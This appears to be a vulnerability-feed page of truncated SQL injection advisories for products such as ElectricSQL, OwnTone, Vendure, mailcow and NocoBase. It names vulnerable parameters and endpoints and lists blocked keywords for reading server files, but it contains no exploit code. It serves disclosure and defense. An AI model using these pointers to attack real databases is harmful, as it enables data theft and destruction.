CVE-2026-40906

A flaw was found in ElectricSQL, a Postgres sync engine. An authenticated user could exploit an error-based SQL injection vulnerability in the /v1/shape API's orderby parameter. This flaw allows an attacker to read, write, and destroy the full contents of the underlying PostgreSQL database. Such ...

Exploit for CVE-2024-46636

CVE-2024-46636 is a SQL Injection vulnerability identified in th...

CVE-2026-6833

The a+HRD developed by aEnrich has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents...

CVE-2026-6833 aEnrich｜a+HRD - SQL Injection

The a+HRD developed by aEnrich has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents...

CVE-2026-6833 aEnrich｜a+HRD - SQL Injection

The a+HRD developed by aEnrich has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents...

CVE-2026-6833

CVE-2026-6833 concerns the a+HRD product developed by aEnrich, described across multiple sources as a SQL Injection vulnerability. The issue affects the application’s ability to read database contents via arbitrary SQL commands when authenticated remotely. Official metrics indicate CVSS v3.1 base...

CVE-2026-41457 OwnTone Server < 29.1 SQL Injection via query and filter Parameters

OwnTone Server versions 28.4 through 29.0 contain a SQL injection vulnerability in DAAP query and filter handling that allows attackers to inject arbitrary SQL expressions by supplying malicious values through the query= and filter= parameters for integer-mapped DAAP fields. Attackers can exploit...

CVE-2026-41457

OwnTone Server (versions 28.4–29.0) contains a SQL injection in DAAP query and filter handling. Malicious values in query= and filter= for integer-mapped DAAP fields bypass filters and may grant unauthorized access to media library data due to insufficient input sanitization. Connected records in...

CVE-2026-41457

OwnTone Server versions 28.4 through 29.0 contain a SQL injection vulnerability in DAAP query and filter handling that allows attackers to inject arbitrary SQL expressions by supplying malicious values through the query= and filter= parameters for integer-mapped DAAP fields. Attackers can exploit...

CVE-2026-41457 OwnTone Server < 29.1 SQL Injection via query and filter Parameters

OwnTone Server versions 28.4 through 29.0 contain a SQL injection vulnerability in DAAP query and filter handling that allows attackers to inject arbitrary SQL expressions by supplying malicious values through the query= and filter= parameters for integer-mapped DAAP fields. Attackers can exploit...

CVE-2026-39486

Improper Neutralization of Special Elements used in an SQL Command 'SQL Injection' vulnerability in WP Chill Download Monitor download-monitor allows Blind SQL Injection.This issue affects Download Monitor: from n/a through = 5.1.8...

PT-2026-34606

Name of the Vulnerable Software and Affected Versions Daptin versions prior to 0.11.4 Description The '/aggregate/:typename' endpoint accepts column and group query parameters that are passed without validation to goqu.L, a raw SQL literal expression builder. This bypasses parameterization,...

OwnTone SQL注入漏洞

OwnTone is an open-source Linux/FreeBSD DAAP iTunes, MPD Music Player Daemon, and RSP Roku media server. Versions 28.4 to 29.0 of OwnTone have a SQL injection vulnerability. This vulnerability stems from insufficient cleaning of the query= and filter= parameters during DAAP queries and filter...

PT-2026-34610

Name of the Vulnerable Software and Affected Versions @nocobase/plugin-collection-sql versions prior to 2.0.39 Description An issue exists where the checkSQL validation function, designed to block dangerous SQL keywords such as pg read file, LOAD FILE, and dblink, is not applied to the...

📄 esiclivre 0.2.2 SQL Injection

The password reset functionality in esiclivre is affected by multiple vulnerabilities. The cpfcnpj parameter is vulnerable to Blind SQL injection due to improper input handling. Additionally, the endpoint lacks CSRF protection, input validation, and rate limiting, enabling attackers to perform us...

PT-2026-37159

Name of the Vulnerable Software and Affected Versions pgx versions prior to 5.9.2 Description SQL injection can occur when the non-default simple protocol is used in conjunction with a dollar quoted string literal in the SQL query. If that string literal contains text that would be interpreted as...

CVE-2026-40906

Electric is a Postgres sync engine. From 1.1.12 to before 1.5.0, the orderby parameter in the ElectricSQL /v1/shape API is vulnerable to error-based SQL injection, allowing any authenticated user to read, write, and destroy the full contents of the underlying PostgreSQL database through crafted...

CVE-2025-70420

Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none...

CVE-2026-40887

Vendure is an open-source headless commerce platform. Starting in version 1.7.4 and prior to versions 2.3.4, 3.5.7, and 3.6.2, an unauthenticated SQL injection vulnerability exists in the Vendure Shop API. A user-controlled query string parameter is interpolated directly into a raw SQL expression...

CVE-2026-40871

mailcow: dockerized is an open source groupware/email suite based on docker. Versions prior to 2026-03b have a second-order SQL injection vulnerability in the quarantinecategory field via the Mailcow API. The /api/v1/add/mailbox endpoint stores quarantinecategory without validation or sanitizatio...